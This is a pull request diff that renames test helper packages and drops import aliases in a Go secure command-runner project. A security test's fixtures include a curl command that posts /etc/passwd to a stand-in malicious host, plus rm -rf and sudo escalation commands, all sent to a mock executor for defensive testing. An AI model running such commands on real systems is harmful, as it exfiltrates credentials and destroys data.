### PR TITLE
test: unify test helper package naming and drop import aliases

### DIFF
--- a/cmd/record/main_test.go
+++ b/cmd/record/main_test.go
@@ -14,7 +14,7 @@ import (
 	"github.com/isseis/go-safe-cmd-runner/internal/cmdcommon"
 	"github.com/isseis/go-safe-cmd-runner/internal/fileanalysis"
 	"github.com/isseis/go-safe-cmd-runner/internal/filevalidator"
-	elfanalyzertesting "github.com/isseis/go-safe-cmd-runner/internal/security/elfanalyzer/testing"
+	"github.com/isseis/go-safe-cmd-runner/internal/security/elfanalyzer/testutil"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
@@ -140,7 +140,7 @@ func TestProcessFiles_WithELF(t *testing.T) {
 	recorder := &fakeRecorder{responses: map[string]error{}}
 
 	staticELF := filepath.Join(tempDir, "static.elf")
-	elfanalyzertesting.CreateStaticELFFile(t, staticELF)
+	elfanalyzertestutil.CreateStaticELFFile(t, staticELF)
 
 	stdout := &bytes.Buffer{}
 	stderr := &bytes.Buffer{}

--- a/cmd/runner/integration_envimport_test.go
+++ b/cmd/runner/integration_envimport_test.go
@@ -7,7 +7,7 @@ import (
 	"github.com/stretchr/testify/require"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/config"
 )
 
@@ -301,7 +301,7 @@ full_path = "%{GlobalPrefix}/%{cmd_user}/%{group_suffix}"
 				runtimeGroup, err := config.ExpandGroup(&cfg.Groups[0], runtimeGlobal)
 				require.NoError(t, err, "should expand group config without error")
 
-				_, err = config.ExpandCommand(&cfg.Groups[0].Commands[0], nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+				_, err = config.ExpandCommand(&cfg.Groups[0].Commands[0], nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 				assert.Error(t, err, "should fail when env_import var not in allowlist")
 			} else {
 				// Test success case
@@ -485,7 +485,7 @@ args = ["test"]
 						// Error at group level is also acceptable
 						return
 					}
-					_, err = config.ExpandCommand(&cfg.Groups[0].Commands[0], nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+					_, err = config.ExpandCommand(&cfg.Groups[0].Commands[0], nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 					assert.Error(t, err, "should fail at command level")
 				}
 			} else {
@@ -622,7 +622,7 @@ args = ["test"]
 
 				// Expand command and verify it uses cached SystemEnv
 				if len(cfg.Groups[0].Commands) > 0 {
-					runtimeCmd, err := config.ExpandCommand(&cfg.Groups[0].Commands[0], nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+					runtimeCmd, err := config.ExpandCommand(&cfg.Groups[0].Commands[0], nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 					require.NoError(t, err, "should expand command config without error")
 
 					// Verify command's env_import used the cached SystemEnv

--- a/cmd/runner/integration_envpriority_test.go
+++ b/cmd/runner/integration_envpriority_test.go
@@ -7,7 +7,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/bootstrap"
@@ -64,7 +64,7 @@ func envPriorityTestHelper(t *testing.T, systemEnv map[string]string, configTOML
 	require.NoError(t, err, "Failed to expand global config")
 	runtimeGroup, err := config.ExpandGroup(&cfg.Groups[0], runtimeGlobal)
 	require.NoError(t, err, "Failed to expand group config")
-	runtimeCmd, err := config.ExpandCommand(cmdSpec, nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+	runtimeCmd, err := config.ExpandCommand(cmdSpec, nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 	require.NoError(t, err, "Failed to expand command config")
 
 	// Call production code to build final environment
@@ -443,7 +443,7 @@ output = "%{data_dir}/%{filename}"
 	require.NoError(t, err, "Failed to expand global config")
 	runtimeGroup, err := config.ExpandGroup(groupSpec, runtimeGlobal)
 	require.NoError(t, err, "Failed to expand group config")
-	runtimeCmd, err := config.ExpandCommand(cmdSpec, nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+	runtimeCmd, err := config.ExpandCommand(cmdSpec, nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 	require.NoError(t, err, "Failed to expand command config")
 
 	// Verify vars expansion at each level

--- a/cmd/runner/integration_security_test.go
+++ b/cmd/runner/integration_security_test.go
@@ -8,8 +8,8 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/filevalidator"
-	executortesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
-	privilegetesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/privilege/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/privilege/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/resource"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
@@ -257,10 +257,10 @@ func TestMaliciousConfigCommandControlSecurity(t *testing.T) {
 	}{
 		{
 			name: "dangerous_rm_command_dry_run_protection",
-			cmd: executortesting.CreateRuntimeCommand(
+			cmd: executortestutil.CreateRuntimeCommand(
 				"rm",
 				[]string{"-rf", "/tmp/should-not-execute-in-test"},
-				executortesting.WithName("dangerous-rm")),
+				executortestutil.WithName("dangerous-rm")),
 			group: &runnertypes.GroupSpec{
 				Name: "malicious-group",
 			},
@@ -270,9 +270,9 @@ func TestMaliciousConfigCommandControlSecurity(t *testing.T) {
 		},
 		{
 			name: "sudo_privilege_escalation_protection",
-			cmd: executortesting.CreateRuntimeCommand("sudo", []string{"rm", "-rf", "/tmp/test-sudo-target"},
-				executortesting.WithName("sudo-escalation"),
-				executortesting.WithRunAsUser("root"),
+			cmd: executortestutil.CreateRuntimeCommand("sudo", []string{"rm", "-rf", "/tmp/test-sudo-target"},
+				executortestutil.WithName("sudo-escalation"),
+				executortestutil.WithRunAsUser("root"),
 			),
 			group: &runnertypes.GroupSpec{
 				Name: "privilege-escalation-group",
@@ -283,10 +283,10 @@ func TestMaliciousConfigCommandControlSecurity(t *testing.T) {
 		},
 		{
 			name: "network_exfiltration_command_protection",
-			cmd: executortesting.CreateRuntimeCommand(
+			cmd: executortestutil.CreateRuntimeCommand(
 				"curl",
 				[]string{"-X", "POST", "-d", "@/etc/passwd", "https://malicious.example.com/steal"},
-				executortesting.WithName("data-exfil"),
+				executortestutil.WithName("data-exfil"),
 			),
 			group: &runnertypes.GroupSpec{
 				Name: "network-exfil-group",
@@ -302,8 +302,8 @@ func TestMaliciousConfigCommandControlSecurity(t *testing.T) {
 			// RuntimeCommand doesn't need PrepareCommand
 
 			// Create DryRunResourceManager with mocks
-			mockExec := executortesting.NewMockExecutor()
-			mockPriv := privilegetesting.NewMockPrivilegeManager(true)
+			mockExec := executortestutil.NewMockExecutor()
+			mockPriv := privilegetestutil.NewMockPrivilegeManager(true)
 			mockPathResolver := &MockPathResolver{}
 
 			// Setup command path resolution

--- a/internal/common/testutil/helpers.go
+++ b/internal/common/testutil/helpers.go
@@ -1,6 +1,6 @@
 //go:build test || performance || integration
 
-package testutil
+package commontestutil
 
 import (
 	"github.com/isseis/go-safe-cmd-runner/internal/common"

--- a/internal/common/testutil/mocks.go
+++ b/internal/common/testutil/mocks.go
@@ -1,7 +1,7 @@
 //go:build test || performance || integration
 
-// Package testutil provides mock implementations for testing common interfaces.
-package testutil
+// Package commontestutil provides mock implementations for testing common interfaces.
+package commontestutil
 
 import (
 	"errors"

--- a/internal/common/testutil/mocks_test.go
+++ b/internal/common/testutil/mocks_test.go
@@ -1,4 +1,4 @@
-package testutil
+package commontestutil
 
 import (
 	"os"

--- a/internal/dynlib/machodylib/analyzer_test.go
+++ b/internal/dynlib/machodylib/analyzer_test.go
@@ -14,7 +14,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/dynlib"
-	machodylibtesting "github.com/isseis/go-safe-cmd-runner/internal/dynlib/machodylib/testing"
+	"github.com/isseis/go-safe-cmd-runner/internal/dynlib/machodylib/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/safefileio"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
@@ -169,11 +169,11 @@ func writeFatBinary(t *testing.T, name string, cpuTypes []macho.Cpu) string {
 	t.Helper()
 	tmp := realPath(t, t.TempDir())
 	path := filepath.Join(tmp, name)
-	slices := make([]machodylibtesting.FatSlice, len(cpuTypes))
+	slices := make([]machodylibtestutil.FatSlice, len(cpuTypes))
 	for i, cpu := range cpuTypes {
-		slices[i] = machodylibtesting.FatSlice{CPU: cpu, Bytes: machodylibtesting.BuildMachOWithDeps(cpu, nil, nil, nil)}
+		slices[i] = machodylibtestutil.FatSlice{CPU: cpu, Bytes: machodylibtestutil.BuildMachOWithDeps(cpu, nil, nil, nil)}
 	}
-	require.NoError(t, os.WriteFile(path, machodylibtesting.BuildFatBinaryFromSlices(slices), 0o600))
+	require.NoError(t, os.WriteFile(path, machodylibtestutil.BuildFatBinaryFromSlices(slices), 0o600))
 	return path
 }
 
@@ -183,7 +183,7 @@ func writeFatBinary(t *testing.T, name string, cpuTypes []macho.Cpu) string {
 // native-arch slice from a Fat binary and returns a valid *macho.File whose
 // Cpu field matches the native CPU type.
 func TestOpenMachO_FatBinary_MatchingSlice(t *testing.T) {
-	nativeCPU := machodylibtesting.NativeCPU()
+	nativeCPU := machodylibtestutil.NativeCPU()
 	path := writeFatBinary(t, "fat_native.bin", []macho.Cpu{nativeCPU})
 
 	fs := safefileio.NewFileSystem(safefileio.FileSystemConfig{})
@@ -203,7 +203,7 @@ func TestOpenMachO_FatBinary_MatchingSlice(t *testing.T) {
 // TestOpenMachO_FatBinary_NoMatchingSlice verifies that openMachO returns an
 // ErrNoMatchingSlice error when the Fat binary contains no native-arch slice.
 func TestOpenMachO_FatBinary_NoMatchingSlice(t *testing.T) {
-	nonNativeCPU := machodylibtesting.NonNativeCPU()
+	nonNativeCPU := machodylibtestutil.NonNativeCPU()
 	path := writeFatBinary(t, "fat_non_native.bin", []macho.Cpu{nonNativeCPU})
 
 	fs := safefileio.NewFileSystem(safefileio.FileSystemConfig{})
@@ -222,7 +222,7 @@ func TestOpenMachO_FatBinary_NoMatchingSlice(t *testing.T) {
 // TestAnalyze_FatBinary_MatchingSlice verifies that Analyze returns (nil, nil, nil)
 // for a Fat binary with a native-arch slice that has no LC_LOAD_DYLIB entries.
 func TestAnalyze_FatBinary_MatchingSlice(t *testing.T) {
-	nativeCPU := machodylibtesting.NativeCPU()
+	nativeCPU := machodylibtestutil.NativeCPU()
 	path := writeFatBinary(t, "fat_native.bin", []macho.Cpu{nativeCPU})
 
 	fs := safefileio.NewFileSystem(safefileio.FileSystemConfig{})
@@ -238,7 +238,7 @@ func TestAnalyze_FatBinary_MatchingSlice(t *testing.T) {
 // ErrNoMatchingSlice (and does NOT swallow it as ErrNotMachO) when the Fat
 // binary has no native-arch slice.
 func TestAnalyze_FatBinary_NoMatchingSlice(t *testing.T) {
-	nonNativeCPU := machodylibtesting.NonNativeCPU()
+	nonNativeCPU := machodylibtestutil.NonNativeCPU()
 	path := writeFatBinary(t, "fat_non_native.bin", []macho.Cpu{nonNativeCPU})
 
 	fs := safefileio.NewFileSystem(safefileio.FileSystemConfig{})
@@ -257,7 +257,7 @@ func TestAnalyze_FatBinary_NoMatchingSlice(t *testing.T) {
 // TestHasDynamicLibDeps_FatBinary_MatchingSlice verifies HasDynamicLibDeps for a
 // Fat binary whose native-arch slice has no LC_LOAD_DYLIB entries.
 func TestHasDynamicLibDeps_FatBinary_MatchingSlice(t *testing.T) {
-	nativeCPU := machodylibtesting.NativeCPU()
+	nativeCPU := machodylibtestutil.NativeCPU()
 	path := writeFatBinary(t, "fat_native.bin", []macho.Cpu{nativeCPU})
 
 	fs := safefileio.NewFileSystem(safefileio.FileSystemConfig{})
@@ -269,7 +269,7 @@ func TestHasDynamicLibDeps_FatBinary_MatchingSlice(t *testing.T) {
 // TestHasDynamicLibDeps_FatBinary_NoMatchingSlice verifies that HasDynamicLibDeps
 // returns (false, nil) for a Fat binary that has no native-arch slice.
 func TestHasDynamicLibDeps_FatBinary_NoMatchingSlice(t *testing.T) {
-	nonNativeCPU := machodylibtesting.NonNativeCPU()
+	nonNativeCPU := machodylibtestutil.NonNativeCPU()
 	path := writeFatBinary(t, "fat_non_native.bin", []macho.Cpu{nonNativeCPU})
 
 	fs := safefileio.NewFileSystem(safefileio.FileSystemConfig{})
@@ -283,8 +283,8 @@ func TestHasDynamicLibDeps_FatBinary_NoMatchingSlice(t *testing.T) {
 // TestAnalyze_SingleArchMachO_NoDeps verifies that Analyze returns (nil, nil, nil) for a
 // single-architecture Mach-O binary that has no LC_LOAD_DYLIB entries.
 func TestAnalyze_SingleArchMachO_NoDeps(t *testing.T) {
-	nativeCPU := machodylibtesting.NativeCPU()
-	buf := machodylibtesting.BuildMachOWithDeps(nativeCPU, nil, nil, nil)
+	nativeCPU := machodylibtestutil.NativeCPU()
+	buf := machodylibtestutil.BuildMachOWithDeps(nativeCPU, nil, nil, nil)
 
 	tmp := realPath(t, t.TempDir())
 	path := filepath.Join(tmp, "nolc.bin")
@@ -302,10 +302,10 @@ func TestAnalyze_SingleArchMachO_NoDeps(t *testing.T) {
 // TestAnalyze_StrongDepResolutionFailure verifies that Analyze returns an error when
 // a LC_LOAD_DYLIB (strong) dependency cannot be resolved.
 func TestAnalyze_StrongDepResolutionFailure(t *testing.T) {
-	nativeCPU := machodylibtesting.NativeCPU()
+	nativeCPU := machodylibtestutil.NativeCPU()
 	tmp := realPath(t, t.TempDir())
 	// Use a path inside the test's temp dir that is guaranteed not to exist.
-	buf := machodylibtesting.BuildMachOWithDeps(nativeCPU,
+	buf := machodylibtestutil.BuildMachOWithDeps(nativeCPU,
 		[]string{filepath.Join(tmp, "does-not-exist.dylib")},
 		nil, nil)
 
@@ -322,10 +322,10 @@ func TestAnalyze_StrongDepResolutionFailure(t *testing.T) {
 // TestAnalyze_WeakDepSkipped verifies that an unresolvable LC_LOAD_WEAK_DYLIB
 // dependency is silently skipped and Analyze returns (nil, nil, nil).
 func TestAnalyze_WeakDepSkipped(t *testing.T) {
-	nativeCPU := machodylibtesting.NativeCPU()
+	nativeCPU := machodylibtestutil.NativeCPU()
 	tmp := realPath(t, t.TempDir())
 	// Use a path inside the test's temp dir that is guaranteed not to exist.
-	buf := machodylibtesting.BuildMachOWithDeps(nativeCPU,
+	buf := machodylibtestutil.BuildMachOWithDeps(nativeCPU,
 		nil,
 		[]string{filepath.Join(tmp, "does-not-exist.dylib")},
 		nil)
@@ -345,9 +345,9 @@ func TestAnalyze_WeakDepSkipped(t *testing.T) {
 // TestAnalyze_UnknownAtToken_Warning verifies that an install name with an unknown
 // @ token generates an AnalysisWarning and does not cause Analyze to fail.
 func TestAnalyze_UnknownAtToken_Warning(t *testing.T) {
-	nativeCPU := machodylibtesting.NativeCPU()
+	nativeCPU := machodylibtestutil.NativeCPU()
 	// @loaderrpath is an intentional misspelling of @loader_path – an unknown @ token.
-	buf := machodylibtesting.BuildMachOWithDeps(nativeCPU,
+	buf := machodylibtestutil.BuildMachOWithDeps(nativeCPU,
 		[]string{"@loaderrpath/libfoo.dylib"},
 		nil, nil)
 
@@ -368,23 +368,23 @@ func TestAnalyze_UnknownAtToken_Warning(t *testing.T) {
 // TestAnalyze_IndirectDeps verifies that Analyze recursively resolves transitive
 // LC_LOAD_DYLIB dependencies (BFS) and includes them all in the returned slice.
 func TestAnalyze_IndirectDeps(t *testing.T) {
-	nativeCPU := machodylibtesting.NativeCPU()
+	nativeCPU := machodylibtestutil.NativeCPU()
 	tmp := realPath(t, t.TempDir())
 
 	// lib2.dylib: leaf, no dependencies.
 	lib2Path := filepath.Join(tmp, "lib2.dylib")
 	require.NoError(t, os.WriteFile(lib2Path,
-		machodylibtesting.BuildMachOWithDeps(nativeCPU, nil, nil, nil), 0o600))
+		machodylibtestutil.BuildMachOWithDeps(nativeCPU, nil, nil, nil), 0o600))
 
 	// lib1.dylib: depends on lib2 by absolute path.
 	lib1Path := filepath.Join(tmp, "lib1.dylib")
 	require.NoError(t, os.WriteFile(lib1Path,
-		machodylibtesting.BuildMachOWithDeps(nativeCPU, []string{lib2Path}, nil, nil), 0o600))
+		machodylibtestutil.BuildMachOWithDeps(nativeCPU, []string{lib2Path}, nil, nil), 0o600))
 
 	// root.bin: depends on lib1 by absolute path.
 	rootPath := filepath.Join(tmp, "root.bin")
 	require.NoError(t, os.WriteFile(rootPath,
-		machodylibtesting.BuildMachOWithDeps(nativeCPU, []string{lib1Path}, nil, nil), 0o600))
+		machodylibtestutil.BuildMachOWithDeps(nativeCPU, []string{lib1Path}, nil, nil), 0o600))
 
 	fs := safefileio.NewFileSystem(safefileio.FileSystemConfig{})
 	a := NewMachODynLibAnalyzer(fs)
@@ -407,7 +407,7 @@ func TestAnalyze_IndirectDeps(t *testing.T) {
 // TestAnalyze_IndirectDeps_RpathFromDylib verifies that @rpath entries in a child
 // .dylib's own LC_RPATH are used to resolve its dependencies, not the root binary's rpaths.
 func TestAnalyze_IndirectDeps_RpathFromDylib(t *testing.T) {
-	nativeCPU := machodylibtesting.NativeCPU()
+	nativeCPU := machodylibtestutil.NativeCPU()
 	tmp := realPath(t, t.TempDir())
 
 	// lib2.dylib lives in a subdirectory; its install name is resolved via @rpath.
@@ -415,12 +415,12 @@ func TestAnalyze_IndirectDeps_RpathFromDylib(t *testing.T) {
 	require.NoError(t, os.MkdirAll(lib2Dir, 0o700))
 	lib2Path := filepath.Join(lib2Dir, "lib2.dylib")
 	require.NoError(t, os.WriteFile(lib2Path,
-		machodylibtesting.BuildMachOWithDeps(nativeCPU, nil, nil, nil), 0o600))
+		machodylibtestutil.BuildMachOWithDeps(nativeCPU, nil, nil, nil), 0o600))
 
 	// lib1.dylib: references lib2 via @rpath, carries its own LC_RPATH pointing to lib2Dir.
 	lib1Path := filepath.Join(tmp, "lib1.dylib")
 	require.NoError(t, os.WriteFile(lib1Path,
-		machodylibtesting.BuildMachOWithDeps(nativeCPU,
+		machodylibtestutil.BuildMachOWithDeps(nativeCPU,
 			[]string{"@rpath/lib2.dylib"},
 			nil,
 			[]string{lib2Dir}), 0o600))
@@ -428,7 +428,7 @@ func TestAnalyze_IndirectDeps_RpathFromDylib(t *testing.T) {
 	// root.bin: references lib1 by absolute path (no rpath expansion needed for lib1).
 	rootPath := filepath.Join(tmp, "root.bin")
 	require.NoError(t, os.WriteFile(rootPath,
-		machodylibtesting.BuildMachOWithDeps(nativeCPU, []string{lib1Path}, nil, nil), 0o600))
+		machodylibtestutil.BuildMachOWithDeps(nativeCPU, []string{lib1Path}, nil, nil), 0o600))
 
 	fs := safefileio.NewFileSystem(safefileio.FileSystemConfig{})
 	a := NewMachODynLibAnalyzer(fs)
@@ -449,27 +449,27 @@ func TestAnalyze_IndirectDeps_RpathFromDylib(t *testing.T) {
 // TestAnalyze_SharedDep_NoDuplicates verifies that a shared transitive dependency
 // (diamond pattern: root→lib1→shared, root→lib2→shared) appears only once in DynLibDeps.
 func TestAnalyze_SharedDep_NoDuplicates(t *testing.T) {
-	nativeCPU := machodylibtesting.NativeCPU()
+	nativeCPU := machodylibtestutil.NativeCPU()
 	tmp := realPath(t, t.TempDir())
 
 	// shared.dylib: leaf, no dependencies.
 	sharedPath := filepath.Join(tmp, "shared.dylib")
 	require.NoError(t, os.WriteFile(sharedPath,
-		machodylibtesting.BuildMachOWithDeps(nativeCPU, nil, nil, nil), 0o600))
+		machodylibtestutil.BuildMachOWithDeps(nativeCPU, nil, nil, nil), 0o600))
 
 	// lib1.dylib and lib2.dylib: both depend on shared.dylib.
 	lib1Path := filepath.Join(tmp, "lib1.dylib")
 	require.NoError(t, os.WriteFile(lib1Path,
-		machodylibtesting.BuildMachOWithDeps(nativeCPU, []string{sharedPath}, nil, nil), 0o600))
+		machodylibtestutil.BuildMachOWithDeps(nativeCPU, []string{sharedPath}, nil, nil), 0o600))
 
 	lib2Path := filepath.Join(tmp, "lib2.dylib")
 	require.NoError(t, os.WriteFile(lib2Path,
-		machodylibtesting.BuildMachOWithDeps(nativeCPU, []string{sharedPath}, nil, nil), 0o600))
+		machodylibtestutil.BuildMachOWithDeps(nativeCPU, []string{sharedPath}, nil, nil), 0o600))
 
 	// root.bin: depends on lib1 and lib2 (diamond).
 	rootPath := filepath.Join(tmp, "root.bin")
 	require.NoError(t, os.WriteFile(rootPath,
-		machodylibtesting.BuildMachOWithDeps(nativeCPU, []string{lib1Path, lib2Path}, nil, nil), 0o600))
+		machodylibtestutil.BuildMachOWithDeps(nativeCPU, []string{lib1Path, lib2Path}, nil, nil), 0o600))
 
 	fs := safefileio.NewFileSystem(safefileio.FileSystemConfig{})
 	a := NewMachODynLibAnalyzer(fs)
@@ -491,7 +491,7 @@ func TestAnalyze_SharedDep_NoDuplicates(t *testing.T) {
 // TestAnalyze_CircularDeps verifies that circular dependencies (A→B→A) do not
 // cause an infinite loop; the visited set prevents redundant processing.
 func TestAnalyze_CircularDeps(t *testing.T) {
-	nativeCPU := machodylibtesting.NativeCPU()
+	nativeCPU := machodylibtestutil.NativeCPU()
 	tmp := realPath(t, t.TempDir())
 
 	libAPath := filepath.Join(tmp, "libA.dylib")
@@ -500,13 +500,13 @@ func TestAnalyze_CircularDeps(t *testing.T) {
 	// Write libA first; it references libB (which does not yet exist – the bytes
 	// embed the path string; the file is resolved later at analysis time).
 	require.NoError(t, os.WriteFile(libAPath,
-		machodylibtesting.BuildMachOWithDeps(nativeCPU, []string{libBPath}, nil, nil), 0o600))
+		machodylibtestutil.BuildMachOWithDeps(nativeCPU, []string{libBPath}, nil, nil), 0o600))
 	require.NoError(t, os.WriteFile(libBPath,
-		machodylibtesting.BuildMachOWithDeps(nativeCPU, []string{libAPath}, nil, nil), 0o600))
+		machodylibtestutil.BuildMachOWithDeps(nativeCPU, []string{libAPath}, nil, nil), 0o600))
 
 	rootPath := filepath.Join(tmp, "root.bin")
 	require.NoError(t, os.WriteFile(rootPath,
-		machodylibtesting.BuildMachOWithDeps(nativeCPU, []string{libAPath}, nil, nil), 0o600))
+		machodylibtestutil.BuildMachOWithDeps(nativeCPU, []string{libAPath}, nil, nil), 0o600))
 
 	fs := safefileio.NewFileSystem(safefileio.FileSystemConfig{})
 	a := NewMachODynLibAnalyzer(fs)
@@ -526,7 +526,7 @@ func TestAnalyze_CircularDeps(t *testing.T) {
 // TestAnalyze_RecursionDepthExceeded verifies that Analyze returns an
 // ErrRecursionDepthExceeded when the dependency chain exceeds MaxRecursionDepth.
 func TestAnalyze_RecursionDepthExceeded(t *testing.T) {
-	nativeCPU := machodylibtesting.NativeCPU()
+	nativeCPU := machodylibtestutil.NativeCPU()
 	tmp := realPath(t, t.TempDir())
 
 	// Build a chain: root → chain[0] → chain[1] → … → chain[MaxRecursionDepth-1] → chain[MaxRecursionDepth].
@@ -542,12 +542,12 @@ func TestAnalyze_RecursionDepthExceeded(t *testing.T) {
 	// chain[MaxRecursionDepth-1] references chain[MaxRecursionDepth] (does not need to exist).
 	for i := 0; i < MaxRecursionDepth; i++ {
 		require.NoError(t, os.WriteFile(chain[i],
-			machodylibtesting.BuildMachOWithDeps(nativeCPU, []string{chain[i+1]}, nil, nil), 0o600))
+			machodylibtestutil.BuildMachOWithDeps(nativeCPU, []string{chain[i+1]}, nil, nil), 0o600))
 	}
 
 	rootPath := filepath.Join(tmp, "root.bin")
 	require.NoError(t, os.WriteFile(rootPath,
-		machodylibtesting.BuildMachOWithDeps(nativeCPU, []string{chain[0]}, nil, nil), 0o600))
+		machodylibtestutil.BuildMachOWithDeps(nativeCPU, []string{chain[0]}, nil, nil), 0o600))
 
 	fs := safefileio.NewFileSystem(safefileio.FileSystemConfig{})
 	a := NewMachODynLibAnalyzer(fs)
@@ -568,8 +568,8 @@ func TestAnalyze_RecursionDepthExceeded(t *testing.T) {
 // The referenced library does not need to exist on disk: IsDyldSharedCacheLib
 // returns false for /opt/homebrew/lib/, so the function returns true immediately.
 func TestHasDynamicLibDeps_SingleArch_NonSharedCacheDep(t *testing.T) {
-	nativeCPU := machodylibtesting.NativeCPU()
-	buf := machodylibtesting.BuildMachOWithDeps(nativeCPU,
+	nativeCPU := machodylibtestutil.NativeCPU()
+	buf := machodylibtestutil.BuildMachOWithDeps(nativeCPU,
 		[]string{"/opt/homebrew/lib/libfoo.dylib"},
 		nil, nil)
 
@@ -587,11 +587,11 @@ func TestHasDynamicLibDeps_SingleArch_NonSharedCacheDep(t *testing.T) {
 // returns (true, nil) for a Fat binary whose native-arch slice has at least one
 // LC_LOAD_DYLIB entry pointing to a non-dyld-shared-cache path.
 func TestHasDynamicLibDeps_FatBinary_NonSharedCacheDep(t *testing.T) {
-	nativeCPU := machodylibtesting.NativeCPU()
-	nativeSlice := machodylibtesting.BuildMachOWithDeps(nativeCPU,
+	nativeCPU := machodylibtestutil.NativeCPU()
+	nativeSlice := machodylibtestutil.BuildMachOWithDeps(nativeCPU,
 		[]string{"/opt/homebrew/lib/libfoo.dylib"},
 		nil, nil)
-	fatBin := machodylibtesting.BuildFatBinaryFromSlices([]machodylibtesting.FatSlice{{CPU: nativeCPU, Bytes: nativeSlice}})
+	fatBin := machodylibtestutil.BuildFatBinaryFromSlices([]machodylibtestutil.FatSlice{{CPU: nativeCPU, Bytes: nativeSlice}})
 
 	tmp := realPath(t, t.TempDir())
 	path := filepath.Join(tmp, "fat_test.bin")

--- a/internal/dynlib/machodylib/testutil/helpers_darwin.go
+++ b/internal/dynlib/machodylib/testutil/helpers_darwin.go
@@ -1,8 +1,8 @@
 //go:build test && darwin
 
-// Package machodylibtesting provides test helpers for building synthetic Mach-O
+// Package machodylibtestutil provides test helpers for building synthetic Mach-O
 // binaries with LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, and LC_RPATH load commands.
-package machodylibtesting
+package machodylibtestutil
 
 import (
 	"debug/macho"

--- a/internal/filevalidator/validator_macho_darwin_test.go
+++ b/internal/filevalidator/validator_macho_darwin_test.go
@@ -8,7 +8,7 @@ import (
 	"testing"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/dynlib/machodylib"
-	machodylibtesting "github.com/isseis/go-safe-cmd-runner/internal/dynlib/machodylib/testing"
+	"github.com/isseis/go-safe-cmd-runner/internal/dynlib/machodylib/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/safefileio"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
@@ -29,7 +29,7 @@ func TestRecord_Force_MachO_UpdatesDynLibDeps(t *testing.T) {
 	// Create a synthetic Mach-O binary referencing libfoo.dylib.
 	binPath := filepath.Join(tempDir, "testbin")
 	require.NoError(t, os.WriteFile(binPath,
-		machodylibtesting.BuildMachOWithDeps(machodylibtesting.NativeCPU(), []string{libPath}, nil, nil), 0o700))
+		machodylibtestutil.BuildMachOWithDeps(machodylibtestutil.NativeCPU(), []string{libPath}, nil, nil), 0o700))
 
 	v, err := New(&SHA256{}, hashDir, ValidatorConfig{
 		MachODynLibAnalyzer: machodylib.NewMachODynLibAnalyzer(

--- a/internal/filevalidator/validator_test.go
+++ b/internal/filevalidator/validator_test.go
@@ -12,7 +12,7 @@ import (
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
 	"github.com/isseis/go-safe-cmd-runner/internal/fileanalysis"
 	"github.com/isseis/go-safe-cmd-runner/internal/security/binaryanalyzer"
-	elfanalyzertesting "github.com/isseis/go-safe-cmd-runner/internal/security/elfanalyzer/testing"
+	"github.com/isseis/go-safe-cmd-runner/internal/security/elfanalyzer/testutil"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
 )
@@ -796,7 +796,7 @@ func TestRecord_SyscallOccurrence_SourcePathSetWhenDebugInfo(t *testing.T) {
 		require.NoError(t, os.MkdirAll(hashDir, 0o700))
 
 		targetFile := filepath.Join(tempDir, "target.bin")
-		elfanalyzertesting.CreateDynamicELFFile(t, targetFile)
+		elfanalyzertestutil.CreateDynamicELFFile(t, targetFile)
 
 		v, err := New(&SHA256{}, hashDir, ValidatorConfig{
 			DebugInfo:       true,
@@ -821,7 +821,7 @@ func TestRecord_SyscallOccurrence_SourcePathSetWhenDebugInfo(t *testing.T) {
 		require.NoError(t, os.MkdirAll(hashDir, 0o700))
 
 		targetFile := filepath.Join(tempDir, "target-libc.bin")
-		elfanalyzertesting.CreateELFWithSymbols(t, targetFile, []elfanalyzertesting.SymbolSpec{{Name: "socket"}})
+		elfanalyzertestutil.CreateELFWithSymbols(t, targetFile, []elfanalyzertestutil.SymbolSpec{{Name: "socket"}})
 
